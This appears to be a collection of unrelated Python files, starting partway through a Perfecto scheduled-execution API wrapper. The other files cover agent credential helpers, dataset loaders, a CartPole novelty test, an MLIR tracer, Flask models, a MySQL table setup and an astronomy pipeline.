endTime {long} -- When the scheduled execution will end. In UTC milliseconds. (default: {None})
repeatCount {int} -- The number of times the scheduled execution will be executed. (default: {None})
description {string} -- The description of the scheduled execution (free text). (default: {None})
responseFormat {str} -- Available values: json, xml (default: {"json"})
admin {bool} -- true to allow users with administrative credentials to create schedules
for users in their group. (default: {False})
"""
if not scheduleKey or not recurrence or not scriptKey:
raise Exception("scheduleKey, recurrence, and scriptKey are required parameters and the values are wrong.")
uriStr = "/schedules?operation=create"
params = {}
rslt = None
if status:
params["status"] = status
if owner:
params["owner"] = owner
if startTime:
params["startTime"] = startTime
if endTime:
params["endTime"] = endTime
if repeatCount:
params["repeatCount"] = repeatCount
if admin:
params["admin"] = admin
params["responseFormat"] = responseFormat
params["scheduleKey"] = scheduleKey
params["recurrence"] = recurrence
params["scriptKey"] = scriptKey
if parameters:
params.update({("param.%s" % k, v) for (k, v) in parameters})
if securedParams:
params.update({("securedParam.%s" % k, v) for (k, v) in securedParams})
uriStr += urlencode(params)
log.debug("parameters are '%s'" % uriStr)
try:
rslt = self.client.send_get(uriStr)
log.debug("results are '%s'" % rslt)
except Exception as e:
log.error("createSchedule API failed because '%s'" % e.message)
raise Exception("create schedule API call failed because '%s'" % e.message)
return rslt
def getScheduledExcutions(self, owner=None, responseFormat="json", admin=False):
"""Last updated: Dec 06, 2016 11:57
Returns a list of scheduled executions.
It is possible to return all scheduled executions,
scheduled executions according to visibility:
private, public, group, or single scheduled executions.
Keyword Arguments:
owner {string} -- The user name of the user who owns the scheduled execution.
This parameter is used in conjunction with the admin
parameter to allow administrators to perform operations
on scheduled executions of other users. If a user with
administrative credentials wants to get a list of scheduled
executions of user "User", specify the parameters as
admin=true and owner=User. (default: {None})
responseFormat {str} -- Available values: json, xml (default: {"json"})
admin {bool} -- true to allow users with administrative
credentials to create schedules for
users in their group. (default: {False})
"""
uriStr = "/schedules?operation=list"
params = {}
rslt = None
if owner:
params["owner"] = owner
if admin:
params["admin"] = admin
params["responseFormat"] = responseFormat
uriStr += urlencode(params)
log.debug("params are '%s'" % uriStr)
try:
rslt = self.client.send_get(uriStr)
log.debug("results are '%s'" % rslt)
except Exception as e:
log.error("getScheduledExecutions API call failed because '%s'", e.message)
raise Exception("list scheduled executions API call failed because '%s'" % e.message)
return rslt
def getExecutionInfo(self, scheduleKey, owner=None, responseFormat="json", admin=False):
"""Retrieves information about the scheduled execution.
It is possible to retrieve information on any scheduled
execution regardless if it was defined as private,
public, or group.
Arguments:
scheduleKey {string} -- scheduleKey for a scheduled execution
Keyword Arguments:
owner {string} -- The user name of the user who owns the scheduled execution.
This parameter is used in conjunction with the admin parameter
to allow administrators to perform operations on scheduled
executions of other users. If a user with administrative
credentials wants to get information for a scheduled execution
of user "User", specify the parameters as admin=true and
owner=User. (default: {None})
responseFormat {str} -- Available values: json, xml (default: {"json"})
admin {bool} -- true to allow users with administrative
credentials to create schedules for users in their group. (default: {False})
"""
if not scheduleKey:
raise Exception("scheduleKey is a required parameter and the data is invalid.")
uriStr = "/schedules/%s?operation=info" % scheduleKey
rslt = None
params = {}
if owner:
params["owner"] = owner
params["responseFormat"] = responseFormat
if admin:
params["admin"] = admin
uriStr += urlencode(params)
log.debug("params are '%s'" % uriStr)
try:
rslt = self.client.send_get(uriStr)
log.debug("results are '%s'" % rslt)
except Exception as e:
log.error("getExecutionInfo API call failed because '%s'" % e.message)
raise Exception("Excecution info API call failed because '%s'" % e.message)
return rslt
def deleteScheduledExecution(self, scheduleKey, owner=None, responseFormat='json', admin=False):
"""Deletes an existing scheduled execution, specified by the scheduleKey
Arguments:
scheduleKey {string} -- schedule ID to update
Keyword Arguments:
owner {string} -- The user name of the user who owns the scheduled execution.
This parameter is used in conjunction with the admin parameter
to allow administrators to perform operations on scheduled
executions of other users. If a user with administrative
credentials wants to delete a scheduled execution of user
"User", specify the parameters as admin=true and owner=User.
(default: {None})
responseFormat {str} -- Available values: JSON, XML (default: {'json'})
admin {bool} -- true to allow users with administrative credentials to create
schedules for users in their group. (default: {False})
"""
if not scheduleKey:
raise Exception("scheduleKey is a required parameter and the data is invalid.")
uriStr = "/schedules/%s?operation=delete" % scheduleKey
rslt = None
params = {}
if owner:
params["owner"]
if admin:
params["admin"] = admin
params["responseFormat"] = responseFormat
uriStr += urlencode(params)
log.debug("params are '%s'" % uriStr)
try:
rslt = self.client.send_get(uriStr)
log.debug("results are '%s'" % rslt)
except Exception as e:
log.error("deleteScheduledExecution API call failed because '%s'" % e.message)
raise Exception("delete scheduled execution failed because '%s'" % e.message)
return rslt
def updateScheduledExecution(self, scheduleKey, owner=None, recurrence=None,
startTime=None, endTime=None, repeateCount=None,
scriptKey=None, description=None, responseFormat='json',
admin=False, *parameters, **securedParams):
"""Updates an existing scheduled execution.
Changes the value of any provided parameter value. Parameters not included
remain unchanged.
Arguments:
scheduleKey {string} -- the key for the schedule to modify
Keyword Arguments:
owner {string} -- The user name of the user who owns the scheduled execution.
This parameter is used in conjunction with the admin
parameter to allow administrators to perform operations on
scheduled executions of other users. If a user with
administrative credentials wants to update a scheduled
execution of user "User", specify the parameters
asadmin=true and owner=User. (default: {None})
recurrence {string} -- Cron expression.
See notes in Create operation Parameters
list
https://developers.perfectomobile.com/display/PD/Create+Scheduled+Execution
(default: {None})
startTime {long} -- When the scheduled execution will start. In Unix/Epoch system
time format (default: {None})
endTime {long} -- When the scheduled execution will end. In Unix/Epoch system
time format (default: {None})
repeateCount {int} -- The number of times the scheduled execution will be executed. (default: {None})
scriptKey {string} -- The repository key of the automation script file. For example,
Private:executeScript.xml (default: {None})
description {string} -- The description of the scheduled execution (free text).
(default: {None})
responseFormat {str} -- Available values: json, xml (default: {'json'})
admin {bool} -- true to allow users with administrative credentials to create
schedules for users in their group. (default: {False})
"""
if not scheduleKey:
raise Exception("schedule key is required and is invalid.")
uriStr = "/schedules/%s?operation=update" % scheduleKey
rslt = None
params = {}
if parameters:
params.update({("param.%s" % k, v) for (k, v) in parameters})
if securedParams:
params.update({("securedParam.%s" % k, v) for (k, v) in securedParams})
if owner:
params["owner"] = owner
if recurrence:
params["recurrence"] = recurrence
if startTime:
params["startTime"] = startTime
if endTime:
params["endTime"] = endTime
if repeateCount:
params["repeateCount"] = repeateCount
if scriptKey:
params["scriptKey"] = scriptKey
if description:
params["description"] = description
if admin:
params["admin"] = admin
params["responseFormat"] = responseFormat
uriStr += urlencode(params)
log.debug("parameters are '%s'" % uriStr)
try:
rslt = self.client.send_get(uriStr)
log.debug("results are '%s'" % rslt)
except Exception as e:
log.error("updateScheduledExecution API call failed because '%s'" % e.message)
raise Exception("update scheduled execution API call failed because '%s'" % e.message)
return rslt
|
import requests
#get list of connections
def get_connections(URL,PARAMS):
try:
r = requests.get(url=URL,params=PARAMS)
get_result = r.json()["results"]
connection_dict = {}
for connection in get_result:
their_did = connection["their_did"]
connection_id = connection["connection_id"]
connection_dict[their_did] = connection_id
except:
connection_dict = {}
return connection_dict
#get list of schemas created
def get_schemas(URL,PARAMS):
try:
r = requests.get(url=URL, params=PARAMS)
data = r.json()["schema_ids"]
except:
data = {}
return data
#get created credential definitions
def get_credential_definitions(URL,PARAMS):
try:
r = requests.get(url=URL, params=PARAMS)
data = r.json()["credential_definition_ids"]
except:
data = {}
return data
#get DIDs of
#get users Verkeys
def get_verkeys(URL,DID):
r = requests.get(url=URL,params=DID)
data = r.json()["verkey"]
return data
#get json
def get_json(URL,json_object):
r = requests.get(url=URL,json=json_object)
data = r.json()
return data
#handle post json
def handle_json(URL,json_object):
r = requests.post(url=URL,json=json_object)
data = r.json()
return data
|
from datasets.Loader import register_dataset
from datasets.Mapillary.MapillaryLike_instance import MapillaryLikeInstanceDataset
from datasets.util.Util import username
DEFAULT_PATH = "C:/Users/Tunar Mahmudov/Desktop/TrackR-CNN/data/KITTI_MOTS"
NAME = "KITTI_instance"
@register_dataset(NAME)
class KittiInstanceDataset(MapillaryLikeInstanceDataset):
def __init__(self, config, subset):
super().__init__(config, subset, NAME, DEFAULT_PATH, "datasets/KITTI/official", 256,
cat_ids_to_use=list(range(24, 34)))
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
fname = 'model_train.log'
print('Reading:', fname)
df = pd.read_csv(fname)
epoch = df['epoch'].values + 1
loss = df['loss'].values
val_loss = df['val_loss'].values
print('epochs: %8d ... %d' % (np.min(epoch), np.max(epoch)))
print('loss: %.6f ... %.6f' % (np.min(loss), np.max(loss)))
print('val_loss: %.6f ... %.6f' % (np.min(val_loss), np.max(val_loss)))
plt.plot(epoch, loss, label='train loss')
plt.plot(epoch, val_loss, label='validation loss')
plt.xlabel('epoch')
plt.ylabel('mean absolute error (MW m$^{-3}$)')
plt.legend()
plt.grid()
i = np.argmin(val_loss)
min_val_loss = val_loss[i]
min_val_epoch = epoch[i]
print('min_val_loss: %.6f' % min_val_loss)
print('min_val_epoch:', min_val_epoch)
(x_min, x_max) = plt.xlim()
(y_min, y_max) = plt.ylim()
plt.plot([x_min, min_val_epoch], [min_val_loss, min_val_loss], 'k--')
plt.plot([min_val_epoch, min_val_epoch], [0., min_val_loss], 'k--')
plt.xlim(0, x_max)
plt.ylim(0., y_max)
plt.tight_layout()
fname = 'plot_train.png'
print('Writing:', fname)
plt.savefig(fname)
|
import sys,math
N=int(input())
A=input().split()
for i in range(N):
A[i]=int(A[i])
if not(0<=A[i]<=10**9):
print("invalid input")
sys.exit()
M=int(input())
if not((1<=N<=10**6)and(N<=M<=10**9)):
print("invalid input")
sys.exit()
K=math.ceil(sum(A)/M)
print(K)
|
#TA 2 BASE
import pdb
import numpy as np
import gym
from gym import make
import cProfile
import re
import uuid
import os
import random
import time
from utils import rollout
import time
import pickle
#import cv2
import PIL
import torch
import json
import argparse
from collections import OrderedDict
from functools import partial
from torch import Tensor
import torch.multiprocessing as mp
from my_lib import *
from vast.opensetAlgos.EVM import EVM_Training , EVM_Inference, EVM_Inference_simple_cpu
from vast import activations
from statistics import mean
import gc
import random
import csv
import UCCS_TA2_helper
from UCCS_TA2_helper import UCCSTA2
UCCS = UCCSTA2()
try:
torch.multiprocessing.set_sharing_strategy('file_system')
except RuntimeError:
pass
try:
mp.set_start_method('spawn', force=True)
except RuntimeError:
pass
number_of_classes = 2
n_cpu = int(os.cpu_count()*0.8)
SEED = 1
os.environ['PYTHONHASHSEED']=str(SEED)
os.environ['TF_CUDNN_DETERMINISTIC'] = '1'
random.seed(SEED)
np.random.seed(SEED)
#tf.random.set_seed(SEED)
env_to_use = 'CartPole-v0'
print('ENV TO USE', env_to_use)
env = gym.make(env_to_use)
noveltyStdMn = []
state_and_dec = []
X = []; Y = [];
x = env.reset()
numSteps = 0
KLlist = []
currentRunProb = []
def testrun():
UCCS.debug = True
nruns = 6
for k in range(nruns):
actual_state = env.reset()
numSteps = 0
state_and_dec = []
currentRunProb = []
for i in range(200):
# Predict steps
action = UCCS.process_instance(actual_state)
# if(UCCS.debug and UCCS.cnt < 25): print(UCCS.debugstring)
if (UCCS.cnt == 4 and k==2):
env.modify("masspole",.1001)
print("Modified mass pole .1001")
UCCS.given=True
UCCS.trial=1
UCCS.episode=2
elif (UCCS.cnt == 4 and k==3):
env.modify("length",.5001)
env.modify("masspole",.1)
print("Modified Lenth to .50001" )
UCCS.given=True
UCCS.trial=1
UCCS.episode=3
elif (UCCS.cnt == 4 and k==4):
env.modify("length",.5)
env.modify("gravity",9.80001)
print("Modified gravity" )
UCCS.given=True
UCCS.trial=1
UCCS.episode=4
elif (UCCS.cnt == 4 and k==5):
env.modify("length",.5)
env.modify("gravity",9.8)
UCCS.given=False
print("Reutrn to normal")
actual_state, r, done, _ = env.step(action) # Take the predicted best action to get next actual state
if done:
if(UCCS.cnt < 199): print("!!!!!!!!!!!!!!!!!!!!!Steps only:", numSteps)
# print (UCCS.problist)
mu = np.mean(UCCS.problist[3:])
sigma = np.std(UCCS.problist[3:])
# print(mu,sigma)
kl = UCCS.kullback_leibler( mu, sigma,UCCS.mean_train, UCCS.stdev_train)
KLlist.append(float(kl))
UCCS.episode += 1
print("Steps, KL/WC",UCCS.cnt,kl, UCCS.world_change_prob())
if(UCCS.given) :
fname = 'Given-History-{}-{}-{}.csv'.format(UCCS.trial,UCCS.episode,uuid.uuid4().hex)
with open(fname, "w", newline="") as f:
writer = csv.writer(f)
writer.writerows(UCCS.statelist)
f.close()
UCCS.cnt=0
UCCS.problist=[]
UCCS.statelist=[]
UCCS.reset(0)
break
# KLlist.append(currentRunProb)
#pdb.set_trace()
cProfile.run('testrun()')
print("mean/stdev KL", np.mean(KLlist),np.std(KLlist))
|
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
import re
from typing import Iterable, Optional
import numpy as np
from mlir import ir as _ir
from mlir.dialects import std as std_ops
from npcomp import _cext
from npcomp.dialects import basicpy as basicpy_ops
from npcomp.dialects import numpy as numpy_ops
from ..exporter import *
from ..types import *
from ..compiler.utils.mlir_utils import *
from .context import *
from .emitters import *
class ModuleBuilder:
"""Builds an MLIR module by tracing functions."""
__slots__ = [
"emitters",
"ic",
]
def __init__(self,
mlir_context: Optional[_ir.Context] = None,
emitter_registry=None):
ic = self.ic = ImportContext(mlir_context)
ic.module = _ir.Module.create(loc=ic.loc)
self.emitters = (emitter_registry
if emitter_registry else EmitterRegistry.create_default())
@property
def module(self):
return self.ic.module
def trace(self, *export_py_funcs: ExportPyFunction):
"""Traces exported py functions."""
for export_py_func in export_py_funcs:
assert isinstance(export_py_func, ExportPyFunction), (
"Expected an exported python function (from the Exporter class)")
tracer = FunctionTracer(self, export_py_func)
with tracer:
tracer.trace()
class FunctionTracer(TraceContext):
"""A trace of a single function."""
__slots__ = [
"module_builder",
"epf",
"_args_array_params",
"_f",
"_f_types",
"_ic",
"_python_args",
"_result_array_params",
"_traced_arrays",
"_external_arrays",
]
def __init__(self, module_builder: ModuleBuilder, epf: ExportPyFunction):
super().__init__(desc="[trace of %s]" % epf.__name__)
self.module_builder = module_builder
self.epf = epf
self._traced_arrays = {} # Mapping of TracedArray to current consumer value
self._external_arrays = {} # Mapping of id to (ndarray, ir.Value)
self._validate()
# Alias some parent members for convenience.
self._ic = module_builder.ic
with self._ic.context:
# Extract ArrayParams for all args and results.
self._args_array_params = [
ArrayParams.from_constraints(arg.constraints)
for arg in self.epf.sig.args
]
self._python_args = [None] * len(self._args_array_params)
self._result_array_params = ArrayParams.from_constraints(
self.epf.sig.result.constraints)
# Create the MLIR function.
self._f, self._f_types = self._create_mlir_function()
self._create_trace_roots()
@property
def entry_block(self) -> _ir.Block:
return self._f.regions[0].blocks[0]
def trace(self):
# Invoke the python function with placeholders.
# TODO: More sophisticated signature merging
# TODO: Multiple results
# TODO: Error reporting
ic = self._ic
ic.insert_end_of_block(self.entry_block)
with ic.context:
py_results = (self.epf.pyfunc(*self._python_args),)
if len(py_results) != len(self._f_types):
raise TracingError("Traced function returned != %d results: %r" % (
len(self._f_types),
py_results,
))
# Narrow all results to the declared return types.
return_operands = []
for py_result, mlir_result_type in zip(py_results, self._f_types):
mlir_result = self.get_traced_array_value(py_result)
# narrow to declared result type.
return_operands.extend(
numpy_ops.NarrowOp(mlir_result_type,
mlir_result,
loc=ic.loc,
ip=ic.ip).results)
std_ops.ReturnOp(return_operands, loc=ic.loc, ip=ic.ip)
ic.pop_ip()
def set_traced_array(self, traced_array, value):
"""Sets the current SSA value for a traced_array."""
assert isinstance(traced_array, TracedArray)
self._traced_arrays[traced_array] = value
def get_traced_array_value(self, traced_array):
if not isinstance(traced_array, TracedArray):
# Generic import of external value. For now, we just treat these as
# local consts.
return self._get_external_array_value(traced_array)
traced_value = self._traced_arrays.get(traced_array)
if traced_value is None:
raise TracingError("Unregistered traced array: %r", (traced_array,))
return traced_value
def _get_external_array_value(self, external_array):
ic = self._ic
if not isinstance(external_array, np.ndarray):
raise TracingError("Expected ndarray but got: %r" % (external_array,))
found_it = self._external_arrays.get(id(external_array))
if found_it:
return found_it[1]
# Import it.
dense_attr = _ir.DenseElementsAttr.get(external_array, context=ic.context)
const_value = std_ops.ConstantOp(dense_attr.type,
dense_attr,
loc=ic.loc,
ip=ic.ip).result
self._external_arrays[id(external_array)] = (external_array, const_value)
return const_value
def _validate(self):
if not all(
arg.type_class == TypeClass.NdArray for arg in self.epf.sig.args):
raise NotImplementedError("Non NdArray args: %r" % (self.epf.sig.args,))
if not self.epf.sig.result.type_class == TypeClass.NdArray:
raise NotImplementedError("Non NdArray result: %r" %
(self.epf.sig.result,))
def _create_mlir_function(self):
ic = self._ic
epf = self.epf
f_args = [
_ir.Type.parse(ap.mlir_tensor_type_asm)
for ap in self._args_array_params
]
f_types = [_ir.Type.parse(self._result_array_params.mlir_tensor_type_asm)]
ic.insert_end_of_block(ic.module.body)
f_type = _ir.FunctionType.get(f_args, f_types)
f, _ = ic.FuncOp(epf.__name__, f_type, create_entry_block=True)
return f, f_types
def _create_trace_roots(self):
entry_block = self.entry_block
for index, ap in enumerate(self._args_array_params):
if ap is not None:
ta = TracedArray(self)
self.set_traced_array(ta, entry_block.arguments[index])
self._python_args[index] = ta
def _resolve_input_ssa_values(self, trace_values: Iterable[TraceValue]):
"""Resolves input python values to SSA values."""
ssa_values = []
for tv in trace_values:
assert tv.type == TraceValueType.NDARRAY, (
"Unsupported TraceValueType: %r" % tv.type)
ssa_value = self.get_traced_array_value(tv.value)
ssa_values.append(ssa_value)
return ssa_values
def _resolve_result_py_values(self,
trace_value_types: Iterable[TraceValueType],
ssa_values):
"""Resolves result SSA values to runtime python values."""
assert len(trace_value_types) == len(ssa_values), (
"Mismatched emitter declared result types and results")
py_values = []
for trace_value_type, ssa_value in zip(trace_value_types, ssa_values):
assert trace_value_type == TraceValueType.NDARRAY, (
"Unsupported TraceValueType: %r" % trace_value_type)
py_value = TracedArray(self)
self.set_traced_array(py_value, ssa_value)
py_values.append(py_value)
return py_values
def _emit_invocation(self, emitter: FuncEmitter, invocation: TraceInvocation):
tv_map = emitter.map_invocation(invocation)
input_ssa_values = self._resolve_input_ssa_values(tv_map.input_trace_values)
request = EmissionRequest(input_ssa_values, ic=self._ic, extra=tv_map.extra)
result_ssa_values = emitter.emit(request)
py_values = self._resolve_result_py_values(tv_map.result_trace_value_types,
result_ssa_values)
return emitter.map_results(py_values, tv_map.extra)
def _handle_ufunc(self, ufunc, method, inputs, kwargs):
emitter = self.module_builder.emitters.lookup_ufunc(ufunc, method)
if not emitter:
return NotImplemented
invocation = TraceInvocation(inputs, kwargs, Protocol.UFUNC, method)
return self._emit_invocation(emitter, invocation)
def _handle_array_func(self, func, types, inputs, kwargs):
emitter = self.module_builder.emitters.lookup_array_func(func)
if not emitter:
return NotImplemented
invocation = TraceInvocation(inputs, kwargs, Protocol.ARRAY_FUNC)
return self._emit_invocation(emitter, invocation)
def _emit_slice_value(self, slice_element):
ic = self._ic
if slice_element == None:
return basicpy_ops.SingletonOp(ic.none_type, loc=ic.loc, ip=ic.ip).result
elif slice_element == Ellipsis:
return basicpy_ops.SingletonOp(ic.ellipsis_type, loc=ic.loc,
ip=ic.ip).result
elif isinstance(slice_element, int):
return std_ops.ConstantOp(ic.index_type,
_ir.IntegerAttr.get(ic.index_type,
slice_element),
loc=ic.loc,
ip=ic.ip).result
elif isinstance(slice_element, slice):
return self._emit_slice_object(slice_element)
else:
# Assume array convertible.
raise NotImplementedError(
"TODO: Slicing with generic arrays not yet implemented")
def _emit_slice_object(self, slice_object: slice):
ic = self._ic
def emit_index(index):
if index is None:
return basicpy_ops.SingletonOp(ic.none_type, loc=ic.loc,
ip=ic.ip).result
else:
return std_ops.ConstantOp(ic.index_type,
_ir.IntegerAttr.get(ic.index_type,
int(index)),
loc=ic.loc,
ip=ic.ip).result
start = emit_index(slice_object.start)
stop = emit_index(slice_object.stop)
step = emit_index(slice_object.step)
result_type = _cext.slot_object_type(ic.context, "slice",
[start.type, stop.type, step.type])
return basicpy_ops.SlotObjectMakeOp(result_type, [start, stop, step],
loc=ic.loc,
ip=ic.ip).result
def _handle_array_getitem(self, array, key):
ic = self._ic
array_value = self.get_traced_array_value(array)
# Array slicing is always based on a tuple.
slice_tuple = key if isinstance(key, tuple) else (key,)
# Resolve and emit each slice element.
slice_values = [self._emit_slice_value(elt) for elt in slice_tuple]
result_value = numpy_ops.GetSliceOp(ic.unknown_array_type,
array_value,
slice_values,
loc=ic.loc,
ip=ic.ip).result
result_array = TracedArray(self)
self.set_traced_array(result_array, result_value)
return result_array
if __name__ == "__main__":
import doctest
doctest.testmod()
|
# Software License Agreement (Apache 2.0 License)
#
# Copyright (c) 2021, The Ohio State University
# Center for Design and Manufacturing Excellence (CDME)
# The Artificially Intelligent Manufacturing Systems Lab (AIMS)
# All rights reserved.
#
# Author: Adam Exley
import os
import numpy as np
import pyrender
import trimesh
from ..urdf import URDFReader
class MeshLoader():
"""Loads appropriate meshes based on active URDF"""
def __init__(self, include_t: bool = False):
self.ureader = URDFReader()
# Able to include/exclude T
if include_t:
self.name_list = self.ureader.mesh_names
self.mesh_list = self.ureader.mesh_paths
else:
self.name_list = self.ureader.mesh_names[:-1]
self.mesh_list = self.ureader.mesh_paths[:-1]
self.load()
def load(self):
"""Read in mesh files to Pyrender meshes"""
self._meshes = []
for file in self.mesh_list:
tm = trimesh.load(os.path.join(os.getcwd(),file))
self._meshes.append(pyrender.Mesh.from_trimesh(tm,smooth=True))
@property
def meshes(self):
return self._meshes
@property
def names(self):
return self.name_list
@property
def meshes_and_names(self):
return self._meshes, self.name_list
def angToPoseArr(yaw,pitch,roll, arr = None):
"""Returns 4x4 pose array.
Converts rotations to a pose array
"""
# Takes pitch, roll, yaw and converts into a pose arr
angs = np.array([yaw,pitch,roll])
c = np.cos(angs)
s = np.sin(angs)
if arr is None:
pose = np.zeros((4,4))
else:
pose = arr
pose[0,0] = c[0] * c[1]
pose[1,0] = c[1] * s[0]
pose[2,0] = -1 * s[1]
pose[0,1] = c[0] * s[1] * s[2] - c[2] * s[0]
pose[1,1] = c[0] * c[2] + np.prod(s)
pose[2,1] = c[1] * s[2]
pose[0,2] = s[0] * s[2] + c[0] * c[2] * s[1]
pose[1,2] = c[2] * s[0] * s[1] - c[0] * s[2]
pose[2,2] = c[1] * c[2]
pose[3,3] = 1.0
return pose
def translatePoseArr(x,y,z, arr = None):
"""Returns 4x4 pose array.
Translates a pose array
"""
if arr is None:
pose = np.zeros((4,4))
else:
pose = arr
pose[0,3] = x
pose[1,3] = y
pose[2,3] = z
return pose
def makePose(x,y,z,pitch,roll,yaw):
"""Returns 4x4 pose array.
Makes pose array given positon and angle
"""
pose = angToPoseArr(yaw,pitch,roll)
pose = translatePoseArr(x,y,z,pose)
return pose
def setPoses(scene, nodes, poses):
"""
Set all the poses of objects in a scene
"""
for node, pose in zip(nodes,poses):
scene.set_pose(node,pose)
|
import json
from config.helper_model import ModuleHelper, db
from datetime import datetime
from werkzeug.security import generate_password_hash, check_password_hash
from sqlalchemy.orm import validates
class UserModel(ModuleHelper):
"""
When create new user, after make instance, before save, do instance.hashed_password(password)!!!
"""
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
password = db.Column(db.String(250), nullable=False)
@validates('password')
def validate_password(self, key, password):
check = '1 2 3 4 5 6 7 8 9'.split()
if not any(i in password for i in check):
raise ValueError("Password there must be at least one number")
if not len(password) >= 4:
raise ValueError("Password must be at least four character")
return password
def hashed_password(self, password):
self.password = generate_password_hash(password)
def check_password(self, user_password):
return check_password_hash(self.password, user_password)
def save(self):
db.session.add(self)
db.session.commit()
def to_json(self):
return {"id": self.id, "name": self.name}
class TaxModel(ModuleHelper):
__tablename__ = 'tax'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
price = db.Column(db.Integer)
cars = db.relationship('CarModel', backref='cars', lazy='dynamic')
class CarModel(ModuleHelper):
__tablename__ = 'car'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
card = db.Column(db.String(250), unique=True)
tax_id = db.Column(db.Integer, db.ForeignKey('tax.id'))
def to_json(self):
tax_name = TaxModel.find_by_id(self.tax_id)
return {'name': self.name, 'card': self.card, "tax_id": self.tax_id, "tax_name": tax_name.name}
class ParkingModel(db.Model):
__tablename__ = 'lot'
id = db.Column(db.Integer, primary_key=True)
car_id = db.Column(db.Integer, db.ForeignKey('car.id'))
in_lot = db.Column(db.DateTime, default=datetime.now())
out_lot = db.Column(db.DateTime, default=None)
def __repr__(self):
return CarModel.find_by_id(self.car_id)
def to_json(self):
a = CarModel.find_by_id(self.car_id)
print()
return {'name': a.name, 'in': str(self.in_lot)}
def save_to_db(self):
db.session.add(self)
db.session.commit()
|
import MySQLdb
import sys
from secret import config
# Database configuration saved in secret.py
# The secret.py file should contain something like this
# config = {
# 'host': 'localhost',
# 'user': 'root',
# 'passwd': 'SECRET',
# }
def assays_db():
"""
Connect to MySQL, and attempt to create or select the assays database.
Then, create a new, blank assays table, and return it.
"""
db = MySQLdb.connect(**config)
cursor = db.cursor()
# Seelct DB, or create if none exists.
try:
db.select_db('assays')
except:
# Create a database
try:
cursor.execute("CREATE DATABASE assays;")
db.select_db('assays')
except:
print "Database creation or selection failed."
sys.exit(1)
# Create a blank table to store lab data.
try:
cursor.execute("DROP TABLE IF EXISTS assays;")
cursor.execute("""
CREATE TABLE assays (
certificate VARCHAR(20) NOT NULL,
sample_id VARCHAR(20) NOT NULL,
material VARCHAR(20) NOT NULL,
method VARCHAR(20),
units VARCHAR(10),
run INT,
value DECIMAL(13,5)
);
""")
except:
print "Unable to create a new assays table."
sys.exit(1)
return cursor
|
'''production script for planetary nebula
this script is a streamlined version of the code in planetary_nebula.ipynb.
The notebook was used for testing and peaking into some results, while
this script is used to produce the final plots/tables.
'''
import sys
from pathlib import Path
import logging
import json
import numpy as np
import matplotlib.pyplot as plt
from astropy.io import ascii, fits
from astropy.table import Table
from astropy.coordinates import SkyCoord
from photutils import DAOStarFinder
from extinction import ccm89
from pnlf.auxiliary import search_table
from pnlf.io import ReadLineMaps
from pnlf.detection import detect_unresolved_sources, completeness_limit
from pnlf.photometry import measure_flux
from pnlf.analyse import emission_line_diagnostics, MaximumLikelihood, pnlf, Distance
from pnlf.plot.pnlf import plot_emission_line_ratio, plot_pnlf
logging.basicConfig(#filename='log.txt',
#filemode='w',
#format='(levelname)s %(name)s %(message)s',
datefmt='%H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
basedir = Path('..')
# we save
with open(basedir / 'data' / 'interim' / 'parameters.json') as json_file:
parameters = json.load(json_file)
with fits.open(basedir / 'data' / 'raw' / 'phangs_sample_table_v1p4.fits') as hdul:
sample_table = Table(hdul[1].data)
for name in parameters.keys():
tmp = search_table(sample_table,name)
if tmp:
d = Distance(tmp['DIST'][0]*1e6,'pc').to_distance_modulus()
parameters[name]["mu"] = d
print('using mu from sample table')
'''
IC5332 NGC1087 NGC1365 NGC1512 NGC1566 NGC1672 NGC2835
NGC3351 NGC3627 NGC4254 NGC4535 NGC5068 NGC628
'''
data_raw = Path('d:\downloads\MUSEDAP')
basedir = Path('..')
for name in parameters.keys():
'''
Step 1: Read in the data
'''
galaxy = ReadLineMaps(data_raw / name)
setattr(galaxy,'mu',parameters[galaxy.name]['mu'])
setattr(galaxy,'alpha',parameters[galaxy.name]['power_index'])
setattr(galaxy,'completeness_limit',parameters[galaxy.name]['completeness_limit'])
'''
Step 2: Detect sources
'''
sources = detect_unresolved_sources(galaxy,
'OIII5006',
StarFinder=DAOStarFinder,
threshold=8,
save=False)
'''
Step 3: Measure fluxes
'''
flux = measure_flux(galaxy,sources, galaxy.alpha,aperture_size=2.,background='local')
for col in ['HA6562','NII6583','SII6716']:
flux[col][flux[col]<0] = flux[f'{col}_err'][flux[col]<0]
flux[col][flux[col]/flux[f'{col}_err']<3] = flux[f'{col}_err'][flux[col]/flux[f'{col}_err']<3]
# calculate astronomical coordinates for comparison
flux['SkyCoord'] = SkyCoord.from_pixel(flux['x'],flux['y'],galaxy.wcs)
# calculate magnitudes from measured fluxes
flux['mOIII'] = -2.5*np.log10(flux['OIII5006']*1e-20) - 13.74
flux['dmOIII'] = np.abs( 2.5/np.log(10) * flux['OIII5006_err'] / flux['OIII5006'] )
# correct for milky way extinction
extinction = ccm89(wave=np.array([5007.]),a_v=0.2,r_v=3.1,unit='aa')[0]
flux['mOIII'] -= extinction
'''
Step 4: Emission line diagnostics
'''
tbl = emission_line_diagnostics(flux,galaxy.mu,galaxy.completeness_limit)
filename = basedir / 'reports' / 'catalogues' / f'pn_candidates_{galaxy.name}.txt'
with open(filename,'w',newline='\n') as f:
tbl['RaDec'] = tbl['SkyCoord'].to_string(style='hmsdms',precision=2)
for col in tbl.colnames:
if col not in ['id','RaDec','type']:
tbl[col].info.format = '%.3f'
ascii.write(tbl[['id','type','x','y','RaDec','OIII5006','OIII5006_err','mOIII','dmOIII','HA6562','HA6562_err',
'NII6583','NII6583_err','SII6716','SII6716_err']][tbl['type']!='NaN'],
f,format='fixed_width',delimiter='\t',overwrite=True)
filename = basedir / 'reports' / 'figures' / f'{galaxy.name}_emission_line'
plot_emission_line_ratio(tbl,galaxy.mu,filename=filename)
'''
Step 5: Fit with maximum likelihood
'''
data = tbl[(tbl['type']=='PN') & (tbl['mOIII']<galaxy.completeness_limit)]['mOIII']
err = tbl[(tbl['type']=='PN') & (tbl['mOIII']<galaxy.completeness_limit)]['dmOIII']
#data = data[data>26]
fitter = MaximumLikelihood(pnlf,
data,
mhigh=galaxy.completeness_limit)
# a good guess would be mu_guess = min(data)-Mmax
